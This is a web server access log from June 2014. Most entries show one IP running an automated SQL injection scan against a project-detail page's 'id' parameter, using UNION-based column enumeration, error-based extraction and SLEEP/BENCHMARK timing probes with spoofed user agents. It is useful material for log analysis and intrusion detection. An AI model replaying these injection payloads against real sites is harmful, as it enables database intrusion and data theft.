86.107.43.19 - - [20/Jun/2014:11:04:12 -0400] "GET /project/detail.php?id=101111111111111%27%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45),CHAR(45,120,49,56,45,81,45),CHAR(45,120,49,57,45,81,45),CHAR(45,120,50,48,45,81,45),CHAR(45,120,50,49,45,81,45),CHAR(45,120,50,50,45,81,45),CHAR(45,120,50,51,45,81,45),CHAR(45,120,50,52,45,81,45),CHAR(45,120,50,53,45,81,45)%20--%20/*%20order%20by%20%27as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; dial; SV1; .NET CLR 1.0.3705)"
86.107.43.19 - - [20/Jun/2014:11:04:51 -0400] "GET /project/detail.php?id=10999999.1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1 HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; dial; E-nrgyPlus; .NET CLR 1.1.4322; InfoPath.1)"
86.107.43.19 - - [20/Jun/2014:11:04:54 -0400] "GET /project/detail.php?id=1099999%22%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,0x27,%27ololo%27,0x27,0x7e)%20FROM%20information_schema.schemata%20LIMIT%201))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%20--%20%22x%22=%22x HTTP/1.1" 200 4143 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8"
86.107.43.19 - - [20/Jun/2014:11:03:32 -0400] "GET /project/detail.php?id=101111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45)%20--%20%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
216.172.56.37 - - [20/Jun/2014:23:00:58 -0400] "GET / HTTP/1.1" 200 3934 "http://privhosting.com/" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)"
83.143.133.12 - - [20/Jun/2014:08:06:38 -0400] "GET /project/detail.php?id=10%27%20AnD%20sLeep%283%29%20ANd%20%271 HTTP/1.0" 200 4143 "-" "Opera/9.27"
86.107.43.19 - - [20/Jun/2014:11:03:55 -0400] "GET /project/detail.php?id=101111111111111%27%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45)%20--%20/*%20order%20by%20%27as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar)"
86.107.43.19 - - [20/Jun/2014:11:04:06 -0400] "GET /project/detail.php?id=101111111111111%27%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45),CHAR(45,120,49,56,45,81,45)%20--%20/*%20order%20by%20%27as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; generic_01_01; InfoPath.1)"
86.107.43.19 - - [20/Jun/2014:11:04:39 -0400] "GET /project/detail.php?id=10%00%27%7C%7CSLeeP%283%29%26%26%271 HTTP/1.0" 200 4143 "-" "Opera/9.27"
130.211.140.244 - - [20/Jun/2014:10:20:57 -0400] "GET / HTTP/1.0" 200 3934 "-" "NerdyBot"
86.107.43.19 - - [20/Jun/2014:11:03:51 -0400] "GET /project/detail.php?id=101111111111111%27%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45)%20--%20/*%20order%20by%20%27as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; yplus 5.6.02b)"
86.107.43.19 - - [20/Jun/2014:11:04:25 -0400] "GET /project/detail.php?id=101111111111111%22%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45)%20--%20/*%20order%20by%20%22as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; elertz 2.4.179[128]; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
86.107.43.19 - - [20/Jun/2014:11:04:26 -0400] "GET /project/detail.php?id=101111111111111%22%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45)%20--%20/*%20order%20by%20%22as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; acc=none; FunWebProducts; .NET CLR 1.1.4322)"
86.107.43.19 - - [20/Jun/2014:11:04:53 -0400] "GET /project/detail.php?id=1099999%27%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,0x27,%27ololo%27,0x27,0x7e)%20FROM%20information_schema.schemata%20LIMIT%201))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%20--%20%27x%27=%27x HTTP/1.1" 200 4143 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8"
62.219.8.231 - - [20/Jun/2014:13:22:10 -0400] "GET / HTTP/1.1" 200 3934 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0"
86.107.43.19 - - [20/Jun/2014:11:03:23 -0400] "GET /project/detail.php?id=101111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45)%20--%20%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; elertz 2.4.179[128]; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
86.107.43.19 - - [20/Jun/2014:11:03:41 -0400] "GET /project/detail.php?id=101111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45),CHAR(45,120,49,56,45,81,45)%20--%20%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
86.107.43.19 - - [20/Jun/2014:11:03:58 -0400] "GET /project/detail.php?id=101111111111111%27%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45)%20--%20/*%20order%20by%20%27as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iOpus-I-M; .NET CLR 1.1.4322)"
86.107.43.19 - - [20/Jun/2014:11:04:06 -0400] "GET /project/detail.php?id=101111111111111%27%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45)%20--%20/*%20order%20by%20%27as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; ds-66843412; Sgrunt|V109|1|S-66843412|dial; .NET CLR 1.1.4322)"
86.107.43.19 - - [20/Jun/2014:11:04:11 -0400] "GET /project/detail.php?id=101111111111111%27%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45),CHAR(45,120,49,56,45,81,45),CHAR(45,120,49,57,45,81,45),CHAR(45,120,50,48,45,81,45),CHAR(45,120,50,49,45,81,45),CHAR(45,120,50,50,45,81,45),CHAR(45,120,50,51,45,81,45)%20--%20/*%20order%20by%20%27as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; elertz 2.4.179[128]; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
146.120.220.151 - - [20/Jun/2014:02:06:50 -0400] "GET /uploads/88-pdf.pdf HTTP/1.0" 200 119612 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
86.107.43.19 - - [20/Jun/2014:11:04:23 -0400] "GET /project/detail.php?id=101111111111111%22%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45)%20--%20/*%20order%20by%20%22as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; dial; SV1; .NET CLR 1.0.3705)"
86.107.43.19 - - [20/Jun/2014:11:04:10 -0400] "GET /project/detail.php?id=101111111111111%27%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45),CHAR(45,120,49,56,45,81,45),CHAR(45,120,49,57,45,81,45),CHAR(45,120,50,48,45,81,45),CHAR(45,120,50,49,45,81,45),CHAR(45,120,50,50,45,81,45)%20--%20/*%20order%20by%20%27as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; eMusic DLM/3; MSN Optimized;US; MSN Optimized;US)"
86.107.43.19 - - [20/Jun/2014:11:04:45 -0400] "GET /project/detail.php?id=10%27%26%26BeNChMaRK%282999999%2CmD5%28NOW%28%29%29%29%26%26%271 HTTP/1.0" 200 4143 "-" "Opera/9.27"
86.107.43.19 - - [20/Jun/2014:11:03:42 -0400] "GET /project/detail.php?id=101111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45),CHAR(45,120,49,56,45,81,45),CHAR(45,120,49,57,45,81,45)%20--%20%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; elertz 2.4.025; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
86.107.43.19 - - [20/Jun/2014:11:03:47 -0400] "GET /project/detail.php?id=101111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45),CHAR(45,120,49,56,45,81,45),CHAR(45,120,49,57,45,81,45),CHAR(45,120,50,48,45,81,45),CHAR(45,120,50,49,45,81,45),CHAR(45,120,50,50,45,81,45)%20--%20%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iOpus-I-M; .NET CLR 1.1.4322)"
86.107.43.19 - - [20/Jun/2014:11:04:17 -0400] "GET /project/detail.php?id=101111111111111%22%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45)%20--%20/*%20order%20by%20%22as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; acc=none; SV1; snprtz|S04087544802137; .NET CLR 1.1.4322)"
86.107.43.19 - - [20/Jun/2014:11:04:26 -0400] "GET /project/detail.php?id=101111111111111%22%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45)%20--%20/*%20order%20by%20%22as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; ds-66843412; Sgrunt|V109|1|S-66843412|dial; .NET CLR 1.1.4322)"
66.249.67.243 - - [20/Jun/2014:11:17:10 -0400] "GET /robots.txt HTTP/1.1" 404 575 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
178.137.34.186 - - [20/Jun/2014:14:59:49 -0400] "GET / HTTP/1.1" 200 3934 "-" "Mozilla/4.0 (compatible; Synapse)"
86.107.43.19 - - [20/Jun/2014:11:03:59 -0400] "GET /project/detail.php?id=101111111111111%27%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45)%20--%20/*%20order%20by%20%27as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; eMusic DLM/3; MSN Optimized;US; MSN Optimized;US)"
86.107.43.19 - - [20/Jun/2014:11:04:15 -0400] "GET /project/detail.php?id=101111111111111%22%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45)%20--%20/*%20order%20by%20%22as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; elertz 2.4.179[128]; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
86.107.43.19 - - [20/Jun/2014:11:04:42 -0400] "GET /project/detail.php?id=10%26%26BeNChMaRK%282999999%2CMD5%28NOW%28%29%29%29 HTTP/1.0" 200 4143 "-" "Opera/9.27"
207.46.13.115 - - [20/Jun/2014:20:34:43 -0400] "GET /projects.php?tag=special HTTP/1.1" 200 7498 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
86.107.43.19 - - [20/Jun/2014:11:04:29 -0400] "GET /project/detail.php?id=101111111111111%22%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45),CHAR(45,120,49,56,45,81,45),CHAR(45,120,49,57,45,81,45),CHAR(45,120,50,48,45,81,45),CHAR(45,120,50,49,45,81,45)%20--%20/*%20order%20by%20%22as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; acc=none; FunWebProducts; .NET CLR 1.1.4322)"
100.43.91.15 - - [20/Jun/2014:18:39:16 -0400] "GET / HTTP/1.1" 200 3934 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
86.107.43.19 - - [20/Jun/2014:11:03:31 -0400] "GET /project/detail.php?id=101111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45)%20--%20%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; dial; SV1; .NET CLR 1.0.3705)"
130.211.140.244 - - [20/Jun/2014:10:20:57 -0400] "GET / HTTP/1.0" 200 3934 "-" "NerdyBot"
86.107.43.19 - - [20/Jun/2014:11:03:21 -0400] "GET /project/detail.php?id=101111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45)%20--%20%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
157.55.39.131 - - [20/Jun/2014:18:22:58 -0400] "GET /robots.txt HTTP/1.1" 404 575 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
86.107.43.19 - - [20/Jun/2014:11:04:00 -0400] "GET /project/detail.php?id=101111111111111%27%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45)%20--%20/*%20order%20by%20%27as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; dial; E-nrgyPlus; .NET CLR 1.1.4322; InfoPath.1)"
86.107.43.19 - - [20/Jun/2014:11:04:46 -0400] "GET /project/detail.php?id=10%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20and%201%3D1 HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; generic_01_01; YPC 3.2.0; .NET CLR 1.1.4322; yplus 5.3.04b)"
86.107.43.19 - - [20/Jun/2014:11:04:52 -0400] "GET /project/detail.php?id=1099999%22%20union%20select%20unhex(hex(version()))%20--%20%22x%22=%22x HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar)"
66.249.67.230 - - [20/Jun/2014:11:17:10 -0400] "GET /project/detail.php?id=67 HTTP/1.1" 200 4351 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.55.39.179 - - [20/Jun/2014:22:39:16 -0400] "GET / HTTP/1.1" 200 3934 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
86.107.43.19 - - [20/Jun/2014:11:03:10 -0400] "GET /project/detail.php?id=101111111111111%27%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45)%20--%20/*%20order%20by%20%27as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iOpus-I-M; .NET CLR 1.1.4322)"
86.107.43.19 - - [20/Jun/2014:11:03:29 -0400] "GET /project/detail.php?id=101111111111111%22%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45)%20--%20/*%20order%20by%20%22as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; ds-66843412; Sgrunt|V109|1|S-66843412|dial; .NET CLR 1.1.4322)"
86.107.43.19 - - [20/Jun/2014:11:03:42 -0400] "GET /project/detail.php?id=101111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45)%20--%20%20/* HTTP/1.1" 200 4143 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8"
86.107.43.19 - - [20/Jun/2014:11:04:18 -0400] "GET /project/detail.php?id=101111111111111%27%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45),CHAR(45,120,49,56,45,81,45),CHAR(45,120,49,57,45,81,45)%20--%20/*%20order%20by%20%27as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; yplus 5.6.02b)"
86.107.43.19 - - [20/Jun/2014:11:04:27 -0400] "GET /project/detail.php?id=101111111111111%22%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45)%20--%20/*%20order%20by%20%22as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; ds-66843412; Sgrunt|V109|1|S-66843412|dial; .NET CLR 1.1.4322)"
157.55.39.127 - - [20/Jun/2014:10:52:27 -0400] "GET /robots.txt HTTP/1.1" 404 575 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
86.107.43.19 - - [20/Jun/2014:11:04:05 -0400] "GET /project/detail.php?id=101111111111111%27%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45)%20--%20/*%20order%20by%20%27as%20/* HTTP/1.1" 200 4143 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; generic_01_01; InfoPath.1)"
65.181.120.179 - - [20/Jun/2014:19:27:58 -0400] "GET /robots.txt HTTP/1.1" 404 575 "-" "AdnormCrawler www.adnorm.com/crawler"
